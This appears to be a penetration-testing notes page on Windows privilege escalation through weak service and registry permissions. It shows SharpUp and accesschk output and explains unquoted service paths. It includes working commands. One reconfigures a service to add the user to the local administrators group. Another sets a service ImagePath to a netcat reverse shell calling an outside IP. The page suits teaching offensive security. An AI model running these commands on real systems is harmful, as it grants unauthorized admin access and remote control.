Weak ACLs (Service & Registry)

This section focuses on exploiting misconfigured ACLs for services and the different ways to exploit them.

We use the tool SharpUp https://github.com/GhostPack/SharpUp/ which runs the following checks:

              - AlwaysInstallElevated
              - CachedGPPPassword
              - DomainGPPPassword
              - HijackablePaths
              - McAfeeSitelistFiles
              - ModifiableScheduledTask
              - ModifiableServiceBinaries
              - ModifiableServiceRegistryKeys
              - ModifiableServices
              - ProcessDLLHijack
              - RegistryAutoLogons
              - RegistryAutoruns
              - TokenPrivileges
              - UnattendedInstallFiles
              - UnquotedServicePath

Below we details the most common attacks:

Modifiable Service Binaries

We run SharpUp

PS C:\hacker> .\SharpUp.exe audit

=== SharpUp: Running Privilege Escalation Checks ===


=== Modifiable Service Binaries ===

  Name             : SecurityService
  DisplayName      : PC Security Management Service
  Description      : Responsible for managing PC security
  State            : Stopped
  StartMode        : Auto
  PathName         : "C:\Program Files (x86)\PCProtect\SecurityService.exe"
  
  <SNIP>

It seems we can modify the bin of a service. We check its permissions:

icacls "C:\Program Files (x86)\PCProtect\SecurityService.exe"

We found Everyone:(I)(F) which means we have full access.

We can now replace the bin by a malicious one and (re)start the service if we can to trigger it.

Weak Service Permissions

C:\hacker> SharpUp.exe audit
 
=== SharpUp: Running Privilege Escalation Checks ===
 
 
=== Modifiable Services ===
 
  Name             : WindscribeService
  DisplayName      : WindscribeService
  Description      : Manages the firewall and controls the VPN tunnel
  State            : Running
  StartMode        : Auto
  PathName         : "C:\Program Files (x86)\Windscribe\WindscribeService.exe"

We check the service DACL with accesschk:

accesschk.exe /accepteula -quvcw WindscribeService

-q (omit banner), -u (suppress errors), -v (verbose), -c (specify name of a Windows service), and -w (show only objects that have write access).

We found we have full control over it:

RW NT AUTHORITY\Authenticated Users
        SERVICE_ALL_ACCESS

This means we can change the service binary (here to a command that makes us admin):

sc config WindscribeService binpath="cmd /c net localgroup administrators hacker /add"

We restart the service

sc stop WindscribeService
sc start WindscribeService

Even if we see an error it worked and we can logout and log back in to get our privileged token.

This method of privesc has a very well known CVE (CVE-2019-1322) that allowed any service account to elevate privileges to SYSTEM by exploiting the service Update Orchestrator Service (UsoSvc), which is responsible for downloading and installing operating system updates.

Unquoted Service Path

For this make sure you read the Service#Service Path section.

We can look for services for which the binary path isn't enclosed in quotes:

C:\hacker> wmic service get name,displayname,pathname,startmode |findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """
GVFS.Service              GVFS.Service                              C:\Program Files\GVFS\GVFS.Service.exe                                                 Auto
System Explorer Service   SystemExplorerHelpService                 C:\Program Files (x86)\System Explorer\service\SystemExplorerService64.exe             Auto

We check the service to confirm:

sc qc SystemExplorerHelpService

We confirm BINARY_PATH_NAME : C:\Program Files (x86)\System Explorer\service\SystemExplorerService64.exe isn't within quotes.

This means we could create malicious service bin to hijack the PATH:

C:\Program.exe
C:\Program Files (x86)\System.exe

Permissive Registry ACLs for Services

We can also look for weak services ACLs in the Windows Registry, using accesschk.

C:\hacker> accesschk.exe /accepteula "mrb3n" -kvuqsw hklm\System\CurrentControlSet\services

Accesschk v6.13 - Reports effective permissions for securable objects
Copyright ⌐ 2006-2020 Mark Russinovich
Sysinternals - www.sysinternals.com

RW HKLM\System\CurrentControlSet\services\ModelManagerService
        KEY_ALL_ACCESS

<SNIP>

We can change the value of ImagePath to a bin/command of our choice:

Set-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\ModelManagerService -Name "ImagePath" -Value "C:\Users\<USER>\Downloads\nc.exe -e cmd.exe 10.10.10.205 5555"

Modifiable Registry Autorun Binary

We can list programs runned at startup with WMIC:

Get-CimInstance Win32_StartupCommand | select Name, command, Location, User |fl

If we have write permissions to the registry for a given binary or can overwrite a binary listed we will be able to privesc the next time the user logs in.

PreviousBypassing UAC NextKernel Exploits

Last updated 2 years ago